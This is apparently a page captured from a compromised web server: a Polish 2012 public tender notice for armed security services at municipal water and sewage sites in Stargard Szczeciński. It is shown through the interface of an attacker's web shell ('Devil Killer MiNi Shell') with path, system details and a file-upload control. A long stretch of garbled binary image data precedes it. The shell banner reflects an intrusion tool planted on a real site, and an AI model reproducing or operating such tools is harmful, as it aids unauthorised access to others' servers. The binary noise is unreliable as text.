JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/29567-N-2012.html

<p class="kh_header"><b>Stargard Szczeciński: Świadczenie usługi kompleksowej ochrony obiektów należących do Miejskiego Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o. w Stargardzie Szczecińskim</b><br>
<b>Numer ogłoszenia: 29567 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Okrzei 6, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5771274, faks 091 5772128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgk.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi kompleksowej ochrony obiektów należących do Miejskiego Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o. w Stargardzie Szczecińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA:
1.1.	Przedmiot zamówienia obejmuje:

1.1.1. dozór i ochronę wskazanych poniżej obiektów użytkowanych przez Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Stargardzie Szczecińskim wraz z terenem do nich przyległym na terenie miasta Stargard Szczeciński, mieniem w nich się znajdującym oraz osobami tam przebywającymi. 
Usługa ochrony musi 	być wykonywana przez licencjonowanych pracowników ochrony osób i mienia wraz  z monitorowaniem lokalnych elektronicznych systemów antywłamaniowych i antynapadowych, wykonaniem interwencji przez uzbrojoną grupę interwencyjną na wezwanie pracownika ochrony pełniącego aktualnie służbę w n/w obiektach:

a) Oczyszczalnia Ścieków MPGK Sp. z o.o. w Stargardzie Szczecińskim, ul. Drzymały 65, 73-110 Stargard Szczeciński - posterunek stały - całodobowy, dwuzmianowy w godzinach od 7.00 do 19.00 i 19.00 do 7.00 jednoosobowy w dni  powszednie i święta. Patrol - jednoosobowy w dni powszednie i święta, wykonywany przez pracownika z posterunku stałego, realizowany po wyznaczonej trasie w dni powszednie w godzinach od 15.00 do 7.00, natomiast w dni wolne od pracy patrol realizowany jest całodobowo. Obiekt podlega obowiązkowej ochronie przez SUFO.  

b) Ujęcie Wody, MPGK Sp. z o.o. w Stargardzie Szczecińskim, ul. Warszawska 24, 73-110 Stargard Szczeciński - bezpośrednia ochrona fizyczna - posterunek stały całodobowy, dwuzmianowy w godzinach 7.00 - 19.00 - 7.00, jednoosobowy w dni powszednie i w święta. Patrol jednoosobowy. dwuzmianowy, realizowany po wyznaczonej trasie co dwie godziny w dni powszednie w godzinach od 15.00 do 22.00 i 22.00 do 7.00, natomiast w dni wolne od pracy realizowany jest całodobowo na dwie zmiany w godzinach 7.00 - 19.00 i 19.00 - 7.00. Obiekt podlega obowiązkowej ochronie SUFO.

c) Siedziba Miejskiego Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o. w Stargardzie Szczecińskim, ul. Okrzei 6, 73-110 Stargard Szczeciński - ochrona dozorowa mienia realizowana jednoosobowo, w dni powszednie od 15.00 do 7.00 dnia następnego, oraz w dni wolne od pracy i święta w godzinach 7.00 - 19.00 - 7.00.

      d) Stargard Szczeciński, ul. Bogusława IV 15 - ochrona dozorowa mienia realizowana jednoosobowo, w dni powszednie od 15.00 do 7.00 dnia następnego, oraz w dni wolne od pracy i święta w godzinach 7.00 - 19.00 - 7.00.


e)   Zakład Obsługi Urządzeń Komunalnych MPGK Sp. z o.o., ul. Spokojna 6 -ochrona
dozorowa mienia realizowana jednoosobowo, w dni powszednie od 15.00 do 7.00 dnia następnego, oraz w dni wolne od pracy i święta w godzinach 7.00 - 19.00 - 7.00.

1.1.2. Wyposażenie służby ochronnej Zamawiający określa wymaganą ilość wyposażenia i sprzętu dla obiektu określonego w pkt 1.1.1. a:	broń palna gazowa krótka z normatywem amunicji - 1 szt.; ręczny miotacz gazu (RMG) - 1 szt.; kajdanki - 1 szt.; pałka obronna wielofunkcyjna (tonfa) - 1 szt.; latarka - 1 szt.; telefon komórkowy - 1 szt.; 
Dla obiektu określonego w pkt 1.1.1. b: broń palna gazowa krótka z normatywem amunicji - 2 szt.; ręczny miotacz gazu (RMG)- 2 szt.; kajdanki - 2 szt.; pałka obronna wielofunkcyjna (tonfa) - 2 szt.; latarka - 2 szt.; telefon komórkowy - 2 szt.; radiotelefony - 2 szt.
Wykonawca dokona zabezpieczenia miejsca składowania broni z uwzględnieniem, iż pomieszczenie portierni w którym jest przechowywana broń jest własnością MPGK Sp. z o.o. i zostanie nieodpłatnie udostępnianą dla Wykonawcy. Wykonawca na swój koszt wyposaży pomieszczenie w atestowany sejf na broń i amunicję oraz uzyska protokół odbioru pomieszczenia do przechowywania broni przez przedstawiciela WPA KWP w Szczecinie.
1.1.3.	Montaż urządzeń i instalacji alarmowych Wykonawca podejmujący się ochrony Ujęcia Wody i Oczyszczalni Ścieków: nieodpłatnie instaluje system telewizji przemysłowej w miejscach i według parametrów zgodnie z Planem ochrony wyżej wymienionych obiektów uzgodnionych i zatwierdzonych przez Komendanta Wojewódzkiego Policji w Szczecinie; serwisuje urządzenia założonego przez siebie monitoringu przemysłowego; opłaca system alarmowy wewnętrzny zainstalowany na dyżurce i zewnętrzny obiektowy dla  podmiotu monitorującego radiowo (SMA).
Ilość urządzeń rejestrujących dla obiektu określonego w pkt 1.1.1. a) wynosi 4 kamery stacjonarne  z urządzeniami rejestrującymi; dla obiektu określonego w pkt 1.1.1. b) wynosi 3 kamery stacjonarne, w tym jedna obrotowa dalekosiężna z urządzeniami rejestrującymi. Wszystkie elementy związane z montażem, dozorem, konserwacją w-w urządzeń Wykonawca wlicza w cenę osobogodziny w formularzu ofertowym.

1.1.4.	 konserwacje i naprawy urządzeń i instalacji systemu alarmowego oraz systemu telewizji przemysłowej celem utrzymania ich w stałej sprawności eksploatacyjnej.
Konserwacje i naprawy urządzeń alarmowych i instalacji systemu alarmowego odbywać się będą 1 raz na miesiąc i będą polegały na sprawdzeniu i dokonaniu wszelkich niezbędnych poprawek i czynności,  a w szczególności:
a)Sprawdzeniu instalacji, rozmieszczeniu i zamocowaniu całego wyposażenia urządzeń na podstawie dokumentacji technicznej;
b)Sprawdzeniu poprawności działania wszystkich czujek, łącznie z urządzeniami uruchamianymi ręcznie;
c)Sprawdzeniu zgodności z wymaganiami wszystkich połączeń giętkich;
d)Sprawdzeniu czy zasilacze główne i rezerwowe pracują i są sprawne;
e)Sprawdzeniu centrali i jej obsługi zgodnie z instrukcją;
f)Sprawdzeniu poprawności działania każdego urządzenia transmisji alarmu przy współpracy z odpowiedzialną władzą albo zainteresowanym alarmowym centrum odbiorczym;
g)Sprawdzeniu poprawności działania każdego akustycznego sygnalizatora alarmowego;
h)Sprawdzeniu czy system alarmowy jest całkowicie w stanie gotowości do pracy; 
i)Wszelkich naprawach urządzeń i instalacji w przypadku ich samoistnego uszkodzenia lub uszkodzenia przez nieupoważnione osoby trzecie z ramienia Wykonawcy;
j)Części niezbędne do naprawy zabezpiecza Wykonawca, natomiast Zamawiający na podstawie dowodu zakupu (faktura, paragon) zwraca Wykonawcy poniesione koszty na zakup niezbędnych części, elementów, zespołów, itp.

Maksymalny czas pełnienia służby przez pracowników ochrony fizycznej ma być zgodny z zapisami Planu Ochrony i obowiązującego Kodeksu Pracy. 

Dla bezpośredniej ochrony fizycznej wymagane jest sześciu pracowników w ciągu doby na obiektach podlegających obowiązkowej ochronie.

Zamawiający zleca do realizacji przedmiotowe działania ochronne obiektów w formie bezpośredniej ochrony fizycznej obiektu oraz monitorowania sygnałów alarmowych obiektów, ujętych w zatwierdzonym przez Komendanta Wojewódzkiego Policji i obowiązującym w MPGK Sp. z o.o. w Stargardzie Szczecińskim Planie Ochrony z dnia 27 sierpnia 2008 roku (Plan Ochrony zostanie udostępniony Wykonawcy (do wglądu w siedzibie Zamawiającego) w dniu podpisania umowy).

1.2.	Zakres działania i odpowiedzialność Wykonawcy: 
a)całodobowa ochrona fizyczna obiektów, o których mowa w pkt. 1.1.1., wraz z mieniem w nich się znajdującym oraz osobami tam przebywającymi;
b)monitorowanie pracy technicznych środków wspomagających ochronę obiektu, informowanie o ich niesprawności serwisantom;
c)prowadzenie i zabezpieczenie dokumentacji w postaci: książki stanu uzbrojenia, książki wydania - przyjęcia broni i amunicji, książki przebiegu służby, książki ruchu osobowo - materiałowego, notatek służbowych, przepustek do wejścia na obiekt osób trzecich;
d)zapewnienie natychmiastowej reakcji zmotoryzowanych uzbrojonych grup interwencyjnych na wezwanie pracownika ochrony pełniącego aktualnie służbę na terenie obiektu;  czas reakcji nie może być dłuższy niż 10 min.;  
e)przekazywanie Policji osób ujętych podczas wykonywania zadań ochronnych, zgodnie z odrębnymi przepisami;
f)współpraca z Policją na zasadach określonych w odrębnych przepisach;
g)wykonywanie innych zadań określonych w Planach Ochrony przekazanych Wykonawcy w dniu podpisaniu umowy, a zawierających m.in. :
-zadania w zakresie przestrzegania regulaminowego czasu pracy na obiekcie,
-opracowanie zakresów obowiązków pracowników ochrony Wykonawcy w czasie pełnienia dyżurów oraz uzyskanie zgody na powyższe Zamawiającego; 
-opracowanie zasad postępowania pracowników ochrony Wykonawcy w sytuacjach odbiegających od norm - kryzysowych oraz uzyskanie zgody na powyższe Zamawiającego;
- zapewnienie przestrzegania w rejonie ochrony przepisów ppoż. i bhp przez wszystkich pracowników Wykonawcy w toku pełnienia dyżurów;
h)Wykonawca w terminie 7 dni od dnia udostępnienia mu Planów Ochrony poszczególnych obiektów, zapozna się dokładnie z owymi Planami, uwzględniając zasady i warunki wykonywania zadań ochrony, wynikające             z Planów Ochrony oraz innych zaleceń Zamawiającego i zobowiązuje się do ich przestrzegania, co przedstawi Zamawiającemu w formie pisemnej deklaracji. 
i)Wykonawca przystosuje do własnych potrzeb urządzenia kontroli obchodu wykorzystując już istniejące wyposażenie ochranianego terenu; 
j)Wykonawca zapewni osoby posiadające odpowiednie kwalifikacje do sprawowania nadzoru i przeprowadzania konserwacji oraz usuwania ewentualnych usterek dot. posiadanych przez Zamawiającego urządzeń i instalacji systemów alarmowych, które Wykonawca dopasuje do własnych potrzeb.
1.3.Przedmiot działania pracowników ochrony Wykonawcy: 
a)całodobowa ochrona fizyczna obiektów, o których mowa w pkt. 1.1.1. 
b)prowadzenie ciągłej i doraźnej (w sytuacjach koniecznych i na wezwanie) obserwacji w ochranianych obiektach;
c)natychmiastowe reagowanie na każdy sygnał o naruszeniu systemu ochrony obiektu oraz ścisłe wykonywanie zadań ochronnych szczegółowo określonych w (Planie Ochrony), bez względu na porę doby i warunki atmosferyczne;
d)kontrolowanie i egzekwowanie przestrzegania przez osoby przebywające na terenie ochranianego obiektu ustalonych norm zachowania oraz zasad porządku publicznego;
e)ujmowanie sprawców przestępstw dokonanych na terenie ochranianego obiektu w celu niezwłocznego przekazania tych osób Policji ( Straży Miejskiej) według odrębnych przepisów;
f)przeciwdziałanie wszelkim zagrożeniom wynikającym z nieprzestrzegania zasad porządkowych określonych  w Planie Ochrony i innych integralnych z nim dokumentów;
g)egzekwowanie zasad przestrzegania porządku publicznego przez wszystkie osoby znajdujące się na terenie ochranianych obiektów;
h)reagowanie w przypadku niepodporządkowania się poleceniom osób, wobec których podejmowana jest interwencja, wymuszanie posłuszeństwa wszelkimi środkami z użyciem środków przymusu bezpośredniego             z zachowaniem zasad określonych w Rozporządzeniu Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań ochrony, podejmowanych wobec osób znajdujących się w granicach chronionych obiektów i obszarów;
i)współdziałanie w wykonywaniu zadań ochronnych z Policją, Strażą Miejską oraz jednostkami ochrony ppoż., zgodnie z Planem Ochrony;
j)powiadamianie telefoniczne w przypadku wystąpienia awarii sieci energetycznej/ telefonicznej Pogotowie energetyczne, wyznaczonych pracowników oraz podejmowanie działań mających na celu zapobieganie skutkom awarii, zgodnie z instrukcją ochrony obiektu;
k)prowadzenie kontroli - obchodów - po godzinach urzędowania - zamknięcia obiektów, zgodnie z instrukcją ochrony obiektów;
l)sporządzanie pisemnych meldunków z przebiegu dyżuru w stosownej dokumentacji;
1.4.	Sposób realizacji przedmiotu działania:  
a)bezpośrednia ochrona fizyczna obiektu nr 1- Oczyszczalnia Ścieków MPGK Sp. z o.o. w Stargardzie Szczecińskim, ul. Drzymały 65, 73-110 Stargard Szczeciński - realizowana będzie w systemie całodobowej i ciągłej ochrony w godzinach od 7.00 do 7.00 dnia następnego, tj. 24 godziny system ochronny, w systemie dwuzmianowym - tj. od 7.00 do 19.00 i 19.00 do 7.00 we wszystkie dni kalendarzowe roku (dni robocze, soboty, niedziele, święta, dni wolne od pracy).
b)bezpośrednia ochrona fizyczna obiektu nr 2 - Ujęcie Wody MPGK Sp. z o.o. w Stargardzie Szczecińskim, ul. Warszawska 24, 73-110 Stargard Szczeciński - realizowana będzie w systemie całodobowej i ciągłej ochrony    w godzinach od 7.00 do 7.00 dnia następnego, tj. 24 godziny system ochronny, w systemie dwuzmianowym - tj. od 7.00 do 19.00 i 19.00 - 7.00 we wszystkie dni kalendarzowe roku (dni robocze, soboty, niedziele, święta, dni wolne od pracy) przez dwóch pracowników ochrony z bronią palną gazową na zmianie.
c)ochrona fizyczna mienia - Siedziba Miejskiego Przedsiębiorstwa Gospodarki Komunalnej Sp. z o.o, ul. Okrzei 6, 73-110 Stargard Szczeciński - realizowana będzie w godzinach od 15.00 do 7.00 dnia następnego w dni robocze, a w, dni wolne od pracy i święta całodobowo..
d)Zakład Oczyszczania Miasta i Zakład Wodociągów i Kanalizacji MPGK Sp. z o.o., 73-110 Stargard Szczeciński, ul. Bogusława IV 15 - ochrona dozorowa mienia realizowana jednoosobowo, w dni powszednie od 15.00 do 7.00 dnia następnego, oraz w dni wolne od pracy i święta w godzinach 7.00 - 19.00 - 7.00

e) Zakład Obsługi Urządzeń Komunalnych MPGK Sp. z o.o., ul. Spokojna 6 -ochrona dozorowa mienia realizowana jednoosobowo, w dni powszednie od 15.00 do 7.00 dnia następnego, oraz w dni wolne od pracy i święta w godzinach 7.00 - 19.00 - 7.00.

f) patrol interwencyjny uzbrojony (tzw. grupa interwencyjna) - Wykonawca musi dysponować uzbrojoną grupą interwencyjną, składającą się co najmniej 2 osób, wyposażonych w broń palną, wyposażonych w oznakowany środek transportu, pozostających w całodobowej dyspozycji Zamawiającego, na wezwanie - we wszystkie dni kalendarzowe w roku (dni robocze, soboty, niedziele, święta i inne dni wolne od pracy), z zadaniem reagowania na sytuacje zagrożenia w obiektach objętych przedmiotem zamówienia, gdzie czas reakcji na wezwanie nie może być dłuższy niż 10 min.;
1.5.Wymagania wobec pracowników ochrony Wykonawcy: 
a)wszyscy pracownicy ochrony realizujący usługę w obiektach muszą być pracownikami wykonującymi zadania ochrony;
b)wszyscy pracownicy ochrony realizujący usługę SUFO muszą być pracownikami ochrony fizycznej i posiadać licencję co najmniej I stopnia;
1.6.Zadania pracowników ochrony podczas pełnienia służby ochronnej: 
Szczegółowe zadania pracowników ochrony i sposób ich realizacji został określony w (Planie Ochrony), który zostanie przekazany Wykonawcy w dniu podpisania umowy.
1.7.Wyposażenie oraz umundurowanie pracowników ochrony stanowią:
a)środki łączności bezprzewodowej,
b)latarka,
c)opatrunek osobisty,
d)środki przymusu bezpośredniego określone w ustawie z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz.U. z 1997r. Nr 114, poz. 740);
e)nadajnik monitorujący system sygnalizacji włamania i napadu oraz bezprzewodowe przyciski napadowe, w które wyposaża Wykonawca,
f)telefon komórkowy i radiotelefony,
g)umundurowanie o jednolitym wzorze dla wszystkich pracowników ochrony, oznaczone w widocznym miejscu emblematem według wzoru Wykonawcy,
h)identyfikator ze zdjęciem,
i)samochód patrolowy,
j)broń palna gazowa dla  pracowników
1.8.Skutki nie wykonania obowiązków ochrony: 
Niewykonanie, nienależyte wykonanie lub zaniechanie wykonania obowiązków ochrony, będzie 	skutkowało pociągnięciem do odpowiedzialności cywilnej, karnej lub finansowej Wykonawcy.

1.9. Wykonawca zaleca, aby przed złożeniem oferty wykonawca zapoznał się z warunkami jakie istnieją na miejscu  w którym będzie wykonywana usługa. Wstęp dla osób będących upoważnionymi pracownikami firm, posiadających stosowną koncesję o której mowa w §6 ust. 4 siwz, po wcześniejszym ustaleniu terminu wizytacji z P Waldemarem Hertel te. 519 546 944; 502-760-785.
2.0. Wykonawca w ofercie uwzględni wszystkie koszta związane z realizacja usługi której zakres wskazuje siwz.
2.1. Wykonawca będzie zobowiązany do współpracy z Zamawiającymi i obecnym Wykonawcą, przy sprawnym przekazaniu ochranianych obiektów dla kompleksowej realizacji usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie do 20 procent wartości zamówień uzupełniających.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.30.00-5, 79.71.00.00-4, 79.71.10.00-1, 79.71.50.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Oświadczenie. 2.Wykonawca musi dołączyć do oferty posiadać koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji  w zakresie usług ochrony osób i mienia na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz.U. z 1997r. Nr 114, poz. 740). 3.Wykonawca musi posiadać decyzję właściwego Komendanta Wojewódzkiego Policji przyznającą prawo do posiadania do celów ochrony bezpieczeństwa osób i mienia, broni palnej do uzbrojenia 	grupy                  interwencyjnej i pracowników ochrony stacjonarnej wydaną zgodnie z wymogami rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 sierpnia1998r. w sparwie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz ewidencjonowania broni i amunicji (Dz.U. z 1998r., Nr 113, poz. 730 oraz Dz. U. z 2003r., Nr 61, poz. 544).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie. 2.Wykonawca musi wykazać się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku  tj., w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej 2 usługi w zakresie zbliżonym do przedmiotu niniejszego zamówienia o wartości nie mniej niż 300 000,00 zł brutto każda. Za spełnienie powyższego warunku doświadczenia w zakresie zbliżonym do przedmiotu zamówienia Zamawiający uzna doświadczenie w świadczeniu usług ochrony w obiektach podlegających obowiązkowej ochronie (zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie  osób i mienia (Dz. U. z 1997r. Nr 114, poz. 740). Usługi muszą być wykonane w ramach jednej umowy, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów wydanych przez Zleceniodawców, potwierdzających, iż usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie.Wykonawca, musi dysponować min. 6 osobami zdolnymi do wykonania przedmiotu zamówienia, które będą uczestniczyć w realizacji przedmiotu zamówienia i będą posiadały udokumentowane kwalifikacje zawodowe do wykonywania ochrony fizycznej, które muszą posiadać licencję co najmniej pierwszego stopnia w oparciu o ustawę z dnia 22 sierpnia 1997r. o ochronie  osób i mienia (Dz. U. z 1997r. Nr 114, poz. 740) wystawioną dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz dla osób nadzorujących wykonywanie przedmiotu zamówienia ze strony Wykonawcy. Jeżeli Wykonawca będzie wykonywał zamówienie przy udziale większej liczby osób, wszystkie te osoby będą musiały posiadać kwalifikacje zawodowe, o których mowa powyżej. Wykonawca dołączy do oferty wykaz osób, oraz załączy dokumenty poświadczające posiadanie w/w uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie.2. Wykonawca musi wykazać, iż posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Suma gwarancyjna polisy nie może być mniejsza niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

